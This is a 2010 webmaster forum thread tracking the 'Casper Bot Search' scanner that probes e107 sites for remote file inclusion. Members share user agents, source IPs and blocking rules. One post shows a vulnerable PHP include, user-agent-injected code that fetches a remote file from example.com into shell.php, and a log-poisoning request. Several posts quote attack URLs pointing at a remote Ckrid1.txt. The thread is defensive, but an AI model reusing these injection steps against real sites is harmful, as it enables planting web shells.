casper bot search attempts to infect sites - Crawler, Spider, and User Agent ID forum at WebmasterWorld - WebmasterWorld

Forum Moderators: open

Message Too Old, No Replies

casper bot search attempts to infect sites

user agent changing almost daily

1
2
»

dstiles

10:47 pm on Jun 28, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seems to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?

BitStrike

1:34 pm on Jun 29, 2010 (gmt 0)

10+ Year Member

One of my web sites was hacked a few hours ago and I think this is done by this bot. Or it just search for vulnerability and reports it to the actual hacker. All files were removed and index.php and casper.php along with some other files were created in the root folder. There was a message like "hacked by casper" inside one of the files.
The site was build on e107, don't remember the actual version but it was definitely not the latest one.
More info is on the [e107.org...] web site.

keyplyr

7:56 pm on Jun 29, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

The the UA string begin with casper?

dstiles

10:41 pm on Jun 29, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

If you mean me, keyplyr, The UA I gave in the title is the complete UA. :)

More today, including russian servers (which seems to predominate) and an australian server.

BitStrike - what were the logged URLs and querystrings?

Can't see how it could be a hack unless the querystring syntax broke the server? Is there a "ged" within your site's pagenames/querystrings?

I suppose the contact form page could compromise a server if it stores data into a SQL database but then there would have to be a second payload hit, I should have thought, which is a bit wasteful.

Just had another search on google. This forum/topic at the top and thereafter almost nothing but logs until about #60 when it gives a forum reference. Sadly google seems to have screwed up its translation service because it translated german into german (and in another case french into french). They really are getting worse! :(

rowan194

2:01 am on Jun 30, 2010 (gmt 0)

10+ Year Member

Here are the 3 UAs I've found so far-

Casper Bot Search
dex Bot Search
Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

I'm 403'ing anything presenting this user agent, then a script which runs every 15 mins adds a firewall rule for that IP. (They won't even be able to connect to the server, let alone request anything)

I've counted 268 unique IPs since just over a week ago, so I wouldn't be surprised if the requests are coming from compromised boxes.

dstiles

4:21 pm on Jun 30, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

I haven't seen dex bot.

I trapped the mozilla one for a couple of reasons without checking further but yes, it does have the contact.php querystring.

147 hits for contact.php, 142 for casper.

dstiles

10:50 pm on Jun 30, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

I've had a look at a few logs that google returns in serps. They do not seem to include the /contact.php but always seem to be the same querystring, though I've only checked half a dozen logs. The querystrings in those I looked at carry the word "casper" as in:

/casper/Ckrid1.txt?

(this seems to be a common point in the logs).

I tried looking in the actual file (a gedcom) for the name "casper" and it's not there so another theory bites the dust.

One google posting mentions casper doing a POST but very little other info. A couple of the serps relate it to exploits.

I have now found a couple of other forums saying this is an exploit attempt aimed at various things including PDFs. Type the following, including quotes, into google:

"casper bot search" exploit

One translated site mentions a "casper rule" which defines the life of something: not sure what as I ran out of patience trying to translate a wiki.

What I can't understand is its persistent hits on a single site/page/querystring. Every single hit, apart from the 404s it generates. For any kind of bot or exploit this is stupid.

thetrasher

4:53 pm on Jul 1, 2010 (gmt 0)

10+ Year Member

UA of "CASPER RFI CRACK Bot" seems to have been changed.

Yesterday:

$ua->agent('Casper Bot Search');

and

my $uagent = "Casper Bot Search";

Today:

$ua->agent('Mozilla/5.0');

and

my $uagent = "Mozilla/5.0";

dstiles

7:57 pm on Jul 2, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Haven't seen that but it's now coming in with exactly the same querystring but with the UA:

sledink bot search

I guess this will morph a few more times as traps develop to kill known UAs. Generalisation helps!

enigma1

10:24 am on Jul 3, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

$ua->agent('Casper Bot Search'); ........ etc.

Looks like a classic hack attempt.

example: vulnerable local script contains code
<?php
include($_GET['p'].".php");
?>

Attacker synthesizes user agent code (sample you may see in the server logs not encoded they use all kinds of things)
<?php
fwrite(fopen('shell.php','w'),
file_get_contents('http://www.example.com/injection.txt'));
?>

it is then utilized with a server request from the attacker:
index.php?p=/var/log/apache/access_log%00

executing the php code or try to see if the scripts disclose any other info.

I hope you get the idea and this is not original by any means there lots of discussions over the web if you want to search in depth. The code logged as a UA can have many variations.

Also they're trying different combinations based on server type and application language.

thetrasher

2:58 pm on Jul 3, 2010 (gmt 0)

10+ Year Member

Another UA:

rk q kangen

dstiles

10:06 pm on Jul 3, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Three or four variations on "x bot search" UA today. Still hitting the same site.page.querystring exactly with one variation from contact.php to discover.

incrediBILL

12:57 am on Jul 6, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Yikes!

I haven't been paying attention but this one is nasty

I've seen UAs of "Casper Bot Search", "rk q kangen" and "MaMa CaSpEr"

They're all trying to find ways to upload files to my site such as:
"somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt?"

I would block anything with "/casper/" in the query string as an added measure of protection.

dstiles

9:42 pm on Jul 6, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Not just casper. I would suggest anything with "bot search" in the UA as that seems to be common to many (all?) I've seen so far, including "dex" and "plaNETWORK" (sic).

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

All those I've seen seem to come from compromised servers from ThePlanet down to tin-pot little RIP ones I've never encountered before. In fact there have been a lot of the latter!

I've only caught two new IPs today (although several old ones) so perhaps they're running out of server farms I haven't yet blocked.

And most are from server farms, with just two or three from business ranges that are probably running open servers.

I still can't understand why they're only hitting one site out of several dozen, and only a single page. Seems very inefficient to me. But hey! let's root for inefficiency! :)

Dijkgraaf

12:21 am on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Same bot, new UA MaMa CaSpEr
Also pointing a parameter to Ckrid1.txt

Ujang

9:24 am on Jul 7, 2010 (gmt 0)

10+ Year Member

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

How about to just allow several popular bot to access your site? Additionally one could perform DNS reverse lookup to ensure the origin of that bot.

popular UA: [user-agents.org...]

how to verify bot: [google.com...]

----

Below could be another way to identify a bad bot..

source: Google Webmaster Blog..In order to fetch from the "official" Googlebot IP range, the bot has to respect robots.txt and our internal hostload conventions so that Google doesn't crawl you too hard.

then you might create hidden link > block it via robot.txt > see if any bot reach that link > get the ip > block it!

just my 2cents

maximillianos

12:30 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

How can you tell if your server has been compromised? We see this bot hitting our logs (only about 30 attempts since June 21st).

I don't see a new "index.php" or "casper.php" in my root. Any other symptoms to watch out for?

maximillianos

12:41 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

I may be worth noting that there is a city named Casper in Wyoming. Not sure if that affects anyone who is blocking "Casper" in the query string.

profo

4:37 pm on Jul 7, 2010 (gmt 0)

10+ Year Member

It appears to be an e107 issue, with a security bug in contact.php. Another user agent I found is: "kmccrew Bot Search".

@max, symptoms not clear. One may consider to block POST queries with a user agent as mentioned above (not: query strings).

dstiles

6:23 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Ujang, thanks but I have it covered. I'm merely speculating on hits I see and trying to help out here. :)

incrediBILL

7:21 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

One may consider to block POST queries with a user agent as mentioned above (not: query strings)

The hits on my site aren't POSTS, they are GETS, so the query string is where I block the attack by actually restricting anything with "http:" in the query string to prevent anything from being uploaded since the rest of the attack vectors seem to be random.

Of course this will break some software/sites so I don't recommend it for everyone, but it stops it cold on my server.

maximillianos

8:41 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Mine are GET requests as well.

caribguy

9:26 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Profo are you sure e107 is related? Haven't seen 'Casper' at all.

e107 probes: e107.css on May 25 to the ip address with the old Toata dragostea UA, and contact.php on June 14 to a handful of domains with a Googlebot UA.

dstiles

10:35 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

All the casper hits today were POSTs. Haven't checked earlier logs but the pattern is the same in my security logs and always trying to hit contact.php. The contact.php in the querystring looks like some reaction to the simple POST to contact.php (without a querystring), which precedes the querystring hit. Both hits get 403's.

incrediBILL

10:52 pm on Jul 7, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

OK, I stand corrected, most of the activity today is totally different from the past few days.

Mostly seeing this coming from So. Korea:

"POST /I[DEX]887 HTTP/1.1" "MaMa CaSpEr"

I don't even know what the heck "/I[DEX]887" is or why anyone would try to post to it but those stupid scripts tried about 30 times with some variations.

Also had a couple of "contact.php" hits from Germany with a Firefox UA:

"POST /contact.php HTTP/1.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Wonder why the sudden shift from GET to POST?

At a minimum the POST no longer exposes the source of the file they're attempting to upload in a log file so it makes it a little harder to figure out the source of the hacked computer and take it down.

maximillianos

12:33 am on Jul 8, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

It seems to have given up our site for now (knock on wood). We last saw it on the 5th when it was still using the GET method.

That is unless it is under a name we have not checked for... which is highly likely.

frontpage

1:10 pm on Jul 8, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

A few ModSecurity 2.x rules

SecRule HTTP_User-Agent "Casper" "deny,log,status:403"
SecRule HTTP_User-Agent "kangen" "deny,log,status:403"
SecRule HTTP_User-Agent "MaMa" "deny,log,status:403"

incrediBILL

8:06 pm on Jul 8, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Is this casper thing done?

I haven't seen a single hit from any of it's variants today.

dstiles

9:18 pm on Jul 8, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Still coming as of a couple of hours ago.

If anyone is interested I have two sets of post/querystring data. Quite a difference between the two sets, one of which is an eval of a BASE64 string. Possibly other sets are different again but I only traced two.

incrediBILL

8:11 pm on Jul 9, 2010 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Sharing the post data would be great
Post it and I'll edit if needed

This 41 message thread spans 2 pages: 41

1
2
»